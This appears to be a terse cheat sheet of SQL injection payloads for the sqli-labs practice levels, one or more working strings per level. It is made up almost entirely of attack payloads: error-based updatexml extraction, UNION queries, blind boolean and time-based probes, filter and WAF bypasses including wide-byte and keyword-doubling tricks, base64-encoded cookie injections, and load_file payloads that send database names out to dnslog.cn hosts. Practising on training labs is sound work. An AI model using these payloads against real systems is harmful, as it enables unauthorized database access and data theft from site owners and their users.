Less-1 Error Based- String
’ union select updatexml(1,concat(0x7e,(SELECT user())),0x7e) --+
Less-42 Stacked Query error based
2’ and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and ’
Less-58
2’ and (updatexml(1,concat(0x7e,(SELECT+database())),0x7e)) --+
Less-2 Error Based- Intiger
1 union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-39 stacked Query Intiger type
1 and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-3 Error Based- String (with Twist)
1 ‘) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-40 stacked Query String type Blind
-1’) union select 1,2,database() --+
Less-43
2’) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) and (’
Less-4 Error Based- DoubleQuotes String
1 “) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-31 FUN with WAF
2”) and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and (“2
Less-60
3”) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-61
3’)) and updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-6 Double Query- Double Quotes- String
1 " union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-23 Error Based- no comments
’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and ‘’'#
Less-25 Trick with OR & AND
2’ anandd updatexml(1,concat(0x7e,(SELECT database())),0x7e) anandd ‘’‘#
Index5
2’ anandd updatexml(1,concat(0x7e,(datadatabasebase())),0x7e)#
Less-26 Trick with comments
2’||updatexml(1,concat(0x7e,(SELECT (database()))),0x7e)||’
Less-32 Bypass addslashes()
2%df%27 and updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
Less-34 Bypass Add SLASHES
3+%df’+and+updatexml(1,concat(0x7e,(SELECT database())),0x7e)±-+
Index4
1’ && updatexml(1,concat(0x7e,(SELECT+database())),0x7e) --+
Less-11 Error Based- String
用户名:’ union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
密码:’ 1
Less-12 Error Based- Double quotes- String
用户名:1" ) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(
密码:"1
Less-13 Double Injection- String- with twist
用户名:1’) union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+(
密码:’ 1
Less-14 Double Injection- Double quotes- String
用户名:1" union select updatexml(1,concat(0x7e,(SELECT database())),0x7e) --+
密码:"1
Less-15 Blind- Boolian Based- String
用户名:admin’ and if(length(database())=8, sleep(1), 1)#
admin’ and if(substr(substr((database()), 1),1,1) = ‘s’, sleep(1), 1)#
Less-16 Blind- Time Based- Double quotes- String
admin") and if(length(database())=8, sleep(1), 1)#
Less-17 Update Query- Error based - String
uname=admin&passwd=2’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e)–+
Less-18 Header Injection- Error Based- string
', updatexml(1,concat(0x7e,(SELECT database())),0x7e), 1)#
', updatexml(1,concat(0x7e,(SELECT database())),0x7e))#
Less-20 Cookie Injection- Error Based- string
’ and updatexml(1,concat(0x7e,(SELECT database())),0x7e)–+
Less-21 Cookie Injection- Error Based- complex - string
a ‘) and updatexml(1,concat(0x7e,(SELECT database())),0x7e) and (’
删除bp原先的cookie,使用以下语句
uname:YSAgJykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QgZGF0YWJhc2UoKSkpLDB4N2UpIGFuZCAoJw==
Less-22 Cookie Injection- Error Based- Double Quotes - string
a" and updatexml(1,concat(0x7e,(SELECT database())),0x7e)#
uname=YSIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChTRUxFQ1QgZGF0YWJhc2UoKSkpLDB4N2UpIw==
Less-27a Trick with SELECT & UNION
0"uNiOn%0ASeLEcT%0A1,2,database()%0A uNiOn%0A SeLEcT%0A 1,2,"
Less-28 Trick with SELECT & UNION
0’)uni on union%0Aselect%0A sel ect%0A1,2,database()%0Auni on union%0Aselect%0A sel ect%0A1,2,(’
Less-28a Trick with SELECT & UNION
0’)union union%0Aselect%0A select%0A1,2,database()%0Aunion union%0Aselect%0A select%0A1,2,(’
Less-29 Protection with WAF
0’union%0Aselect%0A 1,2,database()%0A union%0Aselect%0A 1,2,’
Less-30
0"union%0Aselect%0A 1,2,database()%0A union%0Aselect%0A 1,2,"
Index4
0’union////select////“”,“”,“”,database(),“”,“”,“”,“”;#
Less-9 Blind- Time based- Single Quotes- String
1’ and length(database())=8–+
Less-10 Blind- Time based- Double Quotes- String
1" and length(database())=8–+
Less-25a Trick with OR & AND Blind
2 anandd if(length(database())=8, sleep(1), 1)
Less-26a Trick with comments
1’) anandd (if(length(database())=8, sleep(1), 1)) anandd('1
Less-44
2’;select load_file(concat(‘\\’,(select database()),‘.ny8562.dnslog.cn\abc’));
Less-64
1 and(select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’)))
Less-48
3 and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’)))#
3 and if(1=1,sleep(1),0); select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
Less-49
3’ and if(1=2,sleep(1), 1) and (select load_file(concat(‘\\’,(select database()),‘.9o20ch.dnslog.cn\abc’))) and ‘#
3’ and if(1=1,sleep(1),0);select load_file(concat(‘\\’,(select database()),‘.j6fykz.dnslog.cn\abc’));
3’ and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+
Less-56
4’) and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+
Less-57
4" and (select load_file(concat(‘\\’,(select database()),‘.6oq86c.dnslog.cn\abc’))) --+
1" and (select load_file(concat(‘\\’,(select database()),‘.4kmw9o.dnslog.cn\abc’))) and "
Less-62
3’) and if(1=1,sleep(1),0) and (select load_file(concat(‘\\’,(select database()),‘.vsc4qg.dnslog.cn\abc’))) --+